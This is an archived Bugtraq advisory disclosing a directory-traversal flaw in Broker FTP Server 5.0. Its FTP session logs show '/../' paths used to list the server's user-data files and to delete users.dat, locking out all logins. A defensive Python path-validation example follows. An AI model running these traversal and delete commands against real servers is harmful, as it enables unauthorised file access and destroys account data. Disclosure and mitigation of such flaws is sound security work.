Bugtraq mailing list archives

Broker Ftp Server 5.0 Vulnerability


From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:56:23 -0000

Vulnerability:

Users can break out of their root directory and list
directories.
Depending on the privileges you have, other commands
like delete may be
executed outside of the home directory.


e:\crap\ was used as the home directory.
Deleting files in e:\crap is enabled.

Detail:

Problem: Again relative paths.

dir:
Lists directories outside of the root dir.
Risk: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp          175 Nov 19  2000 UserGrps.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 Users.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw-   1 ftp      ftp           31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw-   1 ftp      ftp           34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw-   1 ftp      ftp           38 Mar 03 16:37 Events_1.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

By deleting users.dat, no one will be able to log on ...


put/get commands seem to be secure...

This was tested with Win2k and the trial version of Broker
ver. 5.0


se00020 () fhs-hagenberg ac at or
se00020 () lion cc
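
Added example, not part of the original post and not Broker's code: one way a server can map every path argument (CWD, LIST, DELE alike) through a single check so that a request such as /../experimental/broker/data/users.dat is refused instead of resolved. The names resolve_ftp_path and PathEscape are hypothetical; e:\crap is the home directory from the report, and the check is lexical only (links and junctions on disk are assumed to be handled separately).

```python
import ntpath      # Windows path rules, usable on any OS
import posixpath   # FTP virtual paths use "/" separators


class PathEscape(Exception):
    """Client path would resolve outside the user's home directory."""


def resolve_ftp_path(home, cwd, client_path):
    """Map an FTP path argument to a Windows path under `home`, or raise.

    home        -- absolute Windows directory, e.g. e:\\crap
    cwd         -- current virtual directory, always starting with "/"
    client_path -- argument exactly as received from the client
    """
    if "\x00" in client_path:
        raise PathEscape("NUL byte in path")
    # Treat both separator styles alike before any parsing.
    client_path = client_path.replace("\\", "/")
    if client_path.startswith("/"):
        virtual = client_path
    else:
        virtual = posixpath.join(cwd, client_path)

    # Walk the components by hand so that ".." above the virtual root is an
    # error, whether the path was relative ("..") or absolute ("/..").
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape("'..' above virtual root: %r" % client_path)
            parts.pop()
            continue
        if ":" in comp:  # drive letters and NTFS alternate data streams
            raise PathEscape("':' in path component: %r" % comp)
        parts.append(comp)

    real = ntpath.normpath(ntpath.join(home, *parts))
    # Defence in depth: the final path must still sit under home.
    home_norm = ntpath.normcase(ntpath.normpath(home))
    if ntpath.commonpath([home_norm, ntpath.normcase(real)]) != home_norm:
        raise PathEscape("resolved outside home: %r" % real)
    return real
```
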

